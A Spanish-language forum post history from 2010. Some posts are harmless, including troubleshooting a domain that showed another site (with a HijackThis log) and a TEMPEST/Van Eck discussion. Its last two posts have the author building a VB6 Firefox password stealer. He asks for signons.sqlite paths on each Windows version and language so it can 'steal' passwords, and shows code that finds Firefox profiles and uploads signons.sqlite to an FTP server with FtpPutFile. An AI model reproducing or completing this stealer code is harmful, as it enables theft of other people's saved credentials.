| |
|
161
|
Seguridad Informática / Seguridad / Re: Ayuda ! Se me abre otra web !!!
|
en: 23 Septiembre 2010, 21:42 pm
|
Ah, porque me olvidé de explicar esto... Le pedí al individuo ignorante del sector técnico de "HostSO" que me reseteara los datos del sitio, por las dudas... me llega un mail diciendo los datos del ftp entre otros datos, miro la ip del FTP y es: xxx.xxx.xxx.3 Le hago un ping al sitio web y me da la IP: xxx.xxx.xxx.32 Cuando veo esto me pregunto a mi mismo, es posible que el ftp esté en un servidor con X IP y que el sitio esté figurando como Y IP ? a lo que me respondo que si es posible es poco probable. Agregué esta información en el ticket de soporte y a los pocos minutos recibo esto: Hello, We do apologize for inconvenience cause to you.We have corrected the DNS for your domain XXXXXXXXXX.com and pointed it to the ip XXX.XXX.XXX.3.It will resolve within 2 to 4 hours. Regards Martin HostSo Support Center Email: support@hostso.com------------------------------ ¿Que habrá sucedido? ¿errores humanos de parte del hosting o alguien malintencionado que hizo ***** todo? Lo bueno es que ya está funcionando correctamente el sitio. |
|
|
|
|
162
|
Seguridad Informática / Seguridad / Re: Ayuda ! Se me abre otra web !!!
|
en: 23 Septiembre 2010, 21:30 pm
|
Les explico, parece que algunas personas ven el sitio correcto (EL MIO) y otras ven un sitio distinto (QUE NO ES MIO) en el mismo dominio  Revisé archivos hosts y .htaccess en el servidor, descartando cualquier inconveniente en los mismos (también había chequeado con proxys y me salía la misma web por lo que en su momento pensé que algo me había modificado todos los browsers o similar), terminé pensando "es un problema de DNS", mal redireccionamiento o mala configuración del mismo, consulté al hosting, y luego de muchas idas y vueltas de diálogo con gente ignorante que atiende una empresa horrible conocida como "HostSO" a la que ojalá se le prendan fuego todos los servidores por ignorantes... llegamos a algo... Hasta me ofrecí para solucionarles el problema yo, pero no entraban en razón... Bueno, luego de unas 4 horas durante las cuales estos ignorantes trataban de hacerme borrar mis cookies y cache y hasta que les pase un tracert (tratandome como un pobre idiota al que le están redireccionando su web) XD se dieron cuenta que el problema era de ellos, y parece que lo solucionaron. Lord R.N.A.: Uso ubuntu por placer, pero lamentablemente trabajo con Windows, este no es un post por placer como verás, tuve la necesidad de consultarles porque se me escapó de las manos y mi trabajo depende de la salud de mi Win2 ^^ En resumidas cuentas, me volví loco, limpié todo el windows q dicho sea de paso no vino nada mal, para terminar descubriendo que era problema del hosting, repito HostSO, horrible, el peor hosting de la historia, si, baratísimo el hosting, pero HORRIBLE. Saludos y gracias a todos, si vuelven estos errores locos les comento ^^ |
|
|
|
|
164
|
Seguridad Informática / Seguridad / Re: Ayuda ! Se me abre otra web !!!
|
en: 23 Septiembre 2010, 04:19 am
|
Ahora subo log de hijackthis, probé con otros navegadores y lo mismo, no instalé nada recientemente. Log: Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 11:21:53 p.m., on 22/09/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.17080)
Boot mode: Normal
Running processes:
C:\WINEKXP\System32\smss.exe
C:\WINEKXP\system32\winlogon.exe
C:\WINEKXP\system32\services.exe
C:\WINEKXP\system32\lsass.exe
C:\WINEKXP\system32\nvsvc32.exe
C:\WINEKXP\system32\svchost.exe
C:\WINEKXP\System32\svchost.exe
C:\Archivos de programa\CheckPoint\ZAForceField\IswSvc.exe
C:\Archivos de programa\Alwil Software\Avast5\AvastSvc.exe
C:\WINEKXP\system32\spoolsv.exe
C:\Archivos de programa\Creative\Shared Files\CTAudSvc.exe
C:\WINEKXP\Explorer.EXE
C:\ARCHIV~1\ALWILS~1\Avast5\avastUI.exe
C:\WINEKXP\system32\RUNDLL32.EXE
C:\WINEKXP\system32\ctfmon.exe
C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe
C:\Archivos de programa\Messenger\msmsgs.exe
C:\Archivos de programa\Xfire\Xfire.exe
C:\Archivos de programa\CheckPoint\ZAForceField\ForceField.exe
C:\Archivos de programa\Java\jre6\bin\jqs.exe
C:\WINEKXP\system32\PnkBstrA.exe
C:\WINEKXP\system32\PnkBstrB.exe
C:\Archivos de programa\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\WINEKXP\system32\svchost.exe
C:\WINEKXP\System32\Drivers\WTSRV.EXE
C:\Archivos de programa\Yahoo!\SoftwareUpdate\YahooAUService.exe
C:\WINEKXP\system32\wbem\wmiapsrv.exe
C:\Archivos de programa\Mozilla Firefox\firefox.exe
C:\Archivos de programa\Outlook Express\msimn.exe
C:\WINEKXP\system32\SNDVOL32.EXE
C:\Archivos de programa\Java\jre6\bin\javaw.exe
C:\Archivos de programa\WinRAR\WinRAR.exe
C:\Archivos de programa\WinRAR\WinRAR.exe
C:\Archivos de programa\Opera\opera.exe
C:\Archivos de programa\Windows Live\Contacts\wlcomm.exe
C:\Archivos de programa\Lavasoft\Ad-Aware\Ad-Aware.exe
C:\Archivos de programa\Lavasoft\Ad-Aware\AAWService.exe
C:\Archivos de programa\Lavasoft\Ad-Aware\AAWTray.exe
C:\Archivos de programa\Teamspeak2_RC2\TeamSpeak.exe
C:\Archivos de programa\WinRAR\WinRAR.exe
C:\WINEKXP\system32\msiexec.exe
C:\Archivos de programa\Trend Micro\HiJackThis\HiJackThis.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos
R3 - URLSearchHook: ZoneAlarm Toolbar - {66f2e20d-0da8-4c11-a9c8-dd8477b88acd} - C:\Archivos de programa\ZoneAlarm\tbZone.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4efb-9B51-7695ECA05670} - C:\ARCHIV~1\Yahoo!\Companion\Installs\cpn\yt.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Archivos de programa\Archivos comunes\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: ZoneAlarm Toolbar - {66f2e20d-0da8-4c11-a9c8-dd8477b88acd} - C:\Archivos de programa\ZoneAlarm\tbZone.dll
O2 - BHO: ZoneAlarm Security Engine Registrar - {8A4A36C2-0535-4D2C-BD3D-496CB7EED6E3} - C:\Archivos de programa\CheckPoint\ZAForceField\TrustChecker\bin\TrustCheckerIEPlugin.dll
O2 - BHO: Windows Live Aplicación auxiliar de inicio de sesión - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Archivos de programa\Archivos comunes\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Archivos de programa\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Archivos de programa\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O2 - BHO: SingleInstance Class - {FDAD4DA1-61A2-4FD8-9C17-86F7AC245081} - C:\ARCHIV~1\Yahoo!\Companion\Installs\cpn\YTSingleInstance.dll
O3 - Toolbar: ZoneAlarm Toolbar - {66f2e20d-0da8-4c11-a9c8-dd8477b88acd} - C:\Archivos de programa\ZoneAlarm\tbZone.dll
O3 - Toolbar: ZoneAlarm Security Engine - {EE2AC4E5-B0B0-4EC6-88A9-BCA1A32AB107} - C:\Archivos de programa\CheckPoint\ZAForceField\TrustChecker\bin\TrustCheckerIEPlugin.dll
O3 - Toolbar: DAEMON Tools Toolbar - {32099AAC-C132-4136-9E9A-4E364A424E17} - C:\Archivos de programa\DAEMON Tools Toolbar\DTToolbar.dll
O3 - Toolbar: Barra Yahoo! - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\ARCHIV~1\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [avast5] C:\ARCHIV~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\Run: [nwiz] C:\Archivos de programa\NVIDIA Corporation\nView\nwiz.exe /installquiet
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\WINEKXP\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINEKXP\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [ZoneAlarm Client] "C:\Archivos de programa\Zone Labs\ZoneAlarm\zlclient.exe"
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINEKXP\system32\ctfmon.exe
O4 - HKCU\..\Run: [msnmsgr] "C:\Archivos de programa\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [MSMSGS] "C:\Archivos de programa\Messenger\msmsgs.exe" /background
O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINEKXP\system32\CTFMON.EXE (User 'SERVICIO LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINEKXP\system32\CTFMON.EXE (User 'Servicio de red')
O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINEKXP\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINEKXP\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: Xfire.lnk = C:\Archivos de programa\Xfire\Xfire.exe
O9 - Extra button: Agregar entrada - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Archivos de programa\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Agregar entrada en Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Archivos de programa\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINEKXP\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINEKXP\Network Diagnostic\xpnetdiag.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{CCCD6122-3912-4FFB-AEA6-ECF51418BC10}: NameServer = 200.40.220.245 200.40.30.245
O20 - Winlogon Notify: !SASWinLogon - C:\Archivos de programa\SUPERAntiSpyware\SASWINLO.DLL
O22 - SharedTaskScheduler: Precargador Browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINEKXP\system32\browseui.dll
O22 - SharedTaskScheduler: Demonio de caché de las categorías de componente - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINEKXP\system32\browseui.dll
O23 - Service: avast! Antivirus - AVAST Software - C:\Archivos de programa\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - AVAST Software - C:\Archivos de programa\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - AVAST Software - C:\Archivos de programa\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Creative Audio Engine Licensing Service - Creative Labs - C:\Archivos de programa\Archivos comunes\Creative Labs Shared\Service\CTAELicensing.exe
O23 - Service: Creative Audio Service (CTAudSvcService) - Creative Technology Ltd - C:\Archivos de programa\Creative\Shared Files\CTAudSvc.exe
O23 - Service: Servicio del administrador de discos lógicos (dmadmin) - Unknown owner - C:\WINEKXP\System32\dmadmin.exe
O23 - Service: Registro de sucesos (Eventlog) - Unknown owner - C:\WINEKXP\system32\services.exe
O23 - Service: Servicio COM de grabación de CD de IMAPI (ImapiService) - Unknown owner - C:\WINEKXP\system32\imapi.exe
O23 - Service: ZoneAlarm Toolbar IswSvc (IswSvc) - Check Point Software Technologies - C:\Archivos de programa\CheckPoint\ZAForceField\IswSvc.exe
O23 - Service: Java Quick Starter (JavaQuickStarterService) - Sun Microsystems, Inc. - C:\Archivos de programa\Java\jre6\bin\jqs.exe
O23 - Service: Lavasoft Ad-Aware Service - Lavasoft - C:\Archivos de programa\Lavasoft\Ad-Aware\AAWService.exe
O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Archivos de programa\Archivos comunes\Macromedia Shared\Service\Macromedia Licensing.exe
O23 - Service: Escritorio remoto compartido de NetMeeting (mnmsrvc) - Unknown owner - C:\WINEKXP\system32\mnmsrvc.exe
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINEKXP\system32\nvsvc32.exe
O23 - Service: Plug and Play (PlugPlay) - Unknown owner - C:\WINEKXP\system32\services.exe
O23 - Service: PnkBstrA - Unknown owner - C:\WINEKXP\system32\PnkBstrA.exe
O23 - Service: PnkBstrB - Unknown owner - C:\WINEKXP\system32\PnkBstrB.exe
O23 - Service: Administrador de sesión de Ayuda de escritorio remoto (RDSessMgr) - Unknown owner - C:\WINEKXP\system32\sessmgr.exe
O23 - Service: Tarjeta inteligente (SCardSvr) - Unknown owner - C:\WINEKXP\System32\SCardSvr.exe
O23 - Service: Registros y alertas de rendimiento (SysmonLog) - Unknown owner - C:\WINEKXP\system32\smlogsvc.exe
O23 - Service: TrueVector Internet Monitor (vsmon) - Check Point Software Technologies LTD - C:\WINEKXP\system32\ZoneLabs\vsmon.exe
O23 - Service: Instantáneas de volumen (VSS) - Unknown owner - C:\WINEKXP\System32\vssvc.exe
O23 - Service: WinTab Service (WinTabService) - Tablet Driver - C:\WINEKXP\System32\Drivers\WTSRV.EXE
O23 - Service: Adaptador de rendimiento de WMI (WmiApSrv) - Unknown owner - C:\WINEKXP\system32\wbem\wmiapsrv.exe
O23 - Service: Yahoo! Updater (YahooAUService) - Yahoo! Inc. - C:\Archivos de programa\Yahoo!\SoftwareUpdate\YahooAUService.exe
--
End of file - 9696 bytes |
|
|
|
|
165
|
Seguridad Informática / Seguridad / Ayuda ! Se me abre otra web !!!
|
en: 23 Septiembre 2010, 03:23 am
|
|
Increíble, no sé q pasó, intento entrar a mi sitio web y me redirecciona a otro sitio (las demás personas ven el sitio correcto).
Revisé el archivos hosts a ver si me habían cambiado algo, pero nada... alguna idea?! me pasa sólo con ese sitio web ... el problema es que trabajo con ese sitio y me complica mucho no poder acceder.
Estoy pasando todos los antibichos posibles... si alguien tiene alguna idea más puntual agradezco su colaboración ^^
|
|
|
|
|
168
|
Seguridad Informática / Hacking / Re: TEMPEST - Ataque pasivo indetectable (extinto o funcional?)(realidad o ficción?)
|
en: 26 Junio 2010, 19:51 pm
|
Ahora sólo te faltaría un Altera Stratix II DSP y un Receptor Dynamic Sciences R1250 (corrijanme si me equivoco) ^^ Si quieren buscar más información al respecto prueben buscando "Van Eck Phreaking", seguro encuentran más info útil  Si encuentran diagramas de construcción casera no duden en postearlos. También pueden leer sobre jaulas de Faraday que sería una de las maneras de protección para este ataque a nivel de una habitación entera, si alguien ofrece servicios de seguridad a empresas podría serle útil esta información, al menos para atraer clientes con un buen argumento de fallas de seguridad en su empresa  , también ví que hay de todo, desde cemento conductor de electricidad hasta tiendas de campaña apantalladas y bolsas anti-estaticas para prevenir el ataque. Mi padre es Ing. en telecomunicaciones, quizás pueda conseguir más información sobre este tema por ese lado. |
|
|
|
|
169
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [VB6] FireFox Passwords Stealer - WinXP y ¿Win7?
|
en: 26 Junio 2010, 19:30 pm
|
Si, lo sé, el problema era que no sabía como usar el %APPDATA% en la línea que lo necesitaba, también podía usar %HOMEPATH% que es lo que hice en cierta parte del código, quizás me la compliqué demasiado, pero bueno, soy nuevo en VB, tengo 2 semanas de VB, bastante que lo pude hacer desde cero sin usar código de terceros xD En cierta parte del código usé algo como: If GetWinVersion = "5,01" And txt_language.Text = "Spanish (Español)." Then
txt_Comando.Text = "dir /b ""%homepath%\DATOSD~1\Mozilla\Firefox\Profiles\*.*"""
End If
If GetWinVersion = "5,01" And txt_language.Text <> "Spanish (Español)." Then
txt_Comando.Text = "dir /b ""%homepath%\AppData\Mozilla\Firefox\Profiles\*.*"""
End If
If GetWinVersion = "6,01" Then
txt_Comando.Text = "dir /b ""%homepath%\AppData\Roaming\Mozilla\Firefox\Profiles\*.*"""
End If
El problema es que no sabía ponerlo aquí: FtpPutFile hConnection, (txt_discolocal.Text & "\Users\" & txt_UserName.Text & "\AppData\Roaming\Mozilla\Firefox\Profiles\" & txt_resultado.Text & "\signons.sqlite"), "signons.sqlite", FTP_TRANSFER_TYPE_UNKNOWN, 0 Me hubiese evitado conseguir el txt_UserName.Text si hubiese podido usar %APPDATA%, ahora pruebo si lo logro. Gracias Karcrack, estuve probando tu crypter, está bastante útil. Le estoy dedicando mucho tiempo a VB a ver si aprendo rápido ^^ |
|
|
|
|
170
|
Seguridad Informática / Análisis y Diseño de Malware / [VB6] FireFox Passwords Stealer - WinXP y ¿Win7?
|
en: 25 Junio 2010, 21:13 pm
|
Hice un stealer para passwords de firefox, funciona perfecto, pero sólo funciona en Win XP en español (y digo en español porque no le agregué la ruta del Win XP en inglés aún) 1) La cosa es que quiero hacer que me robe también las contraseñas en Win7 (inglés y español) y en WinXP en inglés pero no sé las rutas del archivo "signons.sqlite" en esos sistemas operativos. Alguien sería tan amable de decirme en donde se aloja dicho archivo en cada idioma de Win7 y WinXP ? ( o por lo menos digan en donde está en su pc y que sistema operativo e idioma tienen). WinXP Español: C:\Documents and Settings\USUARIO\Datos de programa\Mozilla\Firefox\Profiles\iwlspcot.default\ signons.sqlite2) Por otro lado, ¿sólo se necesita el archivo signons.sqlite? Porque probé con mi pc la parte del robo del archivo y funciona perfecto, y probé con el archivo signons.sqlite de un amigo (que me lo pasó amablemente para probar) y también pude ver sus passwords, pero cuando intento hacerlo con otro signons.sqlite de un Win7 no me deja ver las pass :/ Ví también que en Win7 hay un archivo que difiere de tamaño con respecto a WinXP dentro de la misma carpeta "????????.default" que se llama "cert8.db", es el único archivo que difiere del resto  Alguien me da alguna ayudita? Gracias!!!  EDIT: ahora se me ocurrió leer el CurrentVersion del registro y según la versión de windows ejecutar X lineas, también lo puedo hacer con el idioma, de todos modos sigo necesitando las rutas de los distintos OS's. EDIT2: Listo, ya tengo la parte de detectar OS e idioma del OS terminada, ahora sólo me faltaría saber las rutas de cada OS e Idioma.EDIT3: Ahora lo tengo funcionando en XP (inglés y español) y Win7 en todos los idiomas . Sigo necesitando el nombre de la carpeta "Datos de programa" en otros idiomas (portugues, alemán, y algún otro) en Windows XP. Esto parece un monólogo xD |
|
|
|
|
|
| |
|
Mostrar Mensajes
